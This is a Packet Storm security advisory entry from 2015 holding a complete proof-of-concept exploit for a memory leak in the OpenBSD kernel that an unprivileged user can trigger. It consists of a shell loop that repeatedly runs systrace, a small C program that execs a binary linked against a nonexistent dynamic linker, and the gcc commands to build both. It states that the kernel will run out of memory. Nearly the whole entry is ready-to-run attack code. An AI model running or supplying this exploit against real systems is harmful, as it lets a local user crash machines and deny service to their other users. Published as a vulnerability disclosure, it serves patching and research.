OpenBSD Local Denial Of Service

2015-07-28T00:00:00
ID PACKETSTORM:132870
Type packetstorm
Reporter Maxime Villard
Modified 2015-07-28T00:00:00

Description

                                        
                                            `/*  
* 2015, Maxime Villard  
* Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged  
* user. Found by The Brainy Code Scanner.  
*/  
  
- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -  
  
#! /bin/sh  
while true  
do  
systrace -A ./exploit  
done  
  
- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
  
int main(int argc, char *argv[]) {  
execve("bin", argv, NULL);  
}  
  
- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -  
  
int main() {}  
  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
$ gcc -o exploit exploit.c  
$ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c  
$ ./script.sh  
  
Wait a bit, and the kernel will run out of memory.  
  
  
`